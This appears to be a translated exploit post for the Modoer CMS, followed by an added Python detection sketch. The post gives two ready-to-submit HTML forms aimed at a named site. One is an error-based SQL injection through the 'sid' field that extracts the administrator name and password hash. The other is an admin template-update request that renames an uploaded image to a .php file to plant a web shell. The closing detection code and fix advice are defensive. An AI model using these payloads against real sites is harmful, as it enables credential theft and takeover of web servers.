Cause: He promised that his website had been hacked. In the middle of the night, he asked me to analyze it and give him an exp. The official website has released a patch, and there is no exp on the Internet. We compared against the patch: the vulnerability is in the datacall_class.php file. If you are interested, let us know.

Injection:
<form action="http://www.day5.com/index.php?Act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall" method="post"> <input type="text" name="datacallname" value="_" size="80"> <input type="hidden" name="sid" value="1/**/AND /** /(select/**/1/**/from/**/(select count (*), concat (SELECT concat (adminname, 0x7c, password) FROM modoer_admin limit 0, 1), floor (rand (0) * 2 )) x/**/from/**/information_schema.tables/**/group/**/by/**/x)) # "/> <input type="hidden" name="name" value="b4dboy"/> <input type="submit" value="exp"/> </form>
Note: The datacallname value above is encoded; it is not garbled characters.

In addition, a self-discovered one: renaming a file in the admin backend to get a shell.
<form method="post" action="http://www.day5.com/admin.php?module=&act=template&op=update"> path:<input type="text" name="root_dir" value="uploads/bcastr/" size="40" /><br /> filename:<input type="text" name="fielnames[1][filename]" value="78_1348754079.jpg" size="40" /><br /> newfilename:<input type="text" name="fielnames[1][newfilename]" value="b4dboy.php" size="40" /><br /> <input type="submit" name="dosubmit" value="exp" /></form>
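
A detection sketch for the two requests shown above, as an added example that is not part of the original post: it flags a non-numeric sid on the datacall endpoint and a template update that renames a file to a server-executable name. The integer-only sid rule, the extension list, the cms.example host and the sample bodies are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extensions the web server may execute (assumed list; adjust per deployment).
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Form field that carries the new file name in the template update request.
RENAME_KEY = re.compile(r"fielnames\[\d+\]\[newfilename\]")

def first(params, key):
    """First value of a parsed parameter, or an empty string."""
    return params.get(key, [""])[0]

def findings(url, body):
    """Return alert strings for one POST request (URL plus urlencoded body)."""
    query = {k.lower(): v for k, v in parse_qs(urlsplit(url).query).items()}
    form = parse_qs(body, keep_blank_values=True)
    alerts = []
    # Rule 1: datacall AJAX endpoint. Assumption: a legitimate sid is a plain integer.
    if first(query, "act") == "ajax" and first(query, "do") == "datacall":
        sid = first(form, "sid")
        if sid and not re.fullmatch(r"\d+", sid):
            alerts.append("datacall: non-numeric sid")
    # Rule 2: admin template update that renames a file to an executable name
    # or puts a path separator into the new name.
    if first(query, "act") == "template" and first(query, "op") == "update":
        root = first(form, "root_dir")
        for key, values in form.items():
            if not RENAME_KEY.fullmatch(key):
                continue
            for name in values:
                if EXEC_EXT.search(name) or re.search(r"[\\/]", name):
                    alerts.append(f"template rename: {name!r} in {root!r}")
    return alerts

# Constructed sample requests (host and values are made up for this example).
DATACALL = "http://cms.example/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall"
TEMPLATE = "http://cms.example/admin.php?module=&act=template&op=update"
RENAME = "root_dir=uploads%2Fbcastr%2F&fielnames%5B1%5D%5Bfilename%5D=a.jpg&fielnames%5B1%5D%5Bnewfilename%5D="
SAMPLES = [
    (DATACALL, "datacallname=x&sid=12&name=a"),
    (DATACALL, "datacallname=x&sid=1%2F**%2FAND%2F**%2F1%3D1&name=a"),
    (TEMPLATE, RENAME + "a.php"),
    (TEMPLATE, RENAME + "b.jpg"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(findings(url, body) or "ok")
```

The same two rules translate directly into WAF or log-pipeline conditions; on the application side the matching fixes are casting sid to an integer before it reaches the query and rejecting executable extensions in the rename handler.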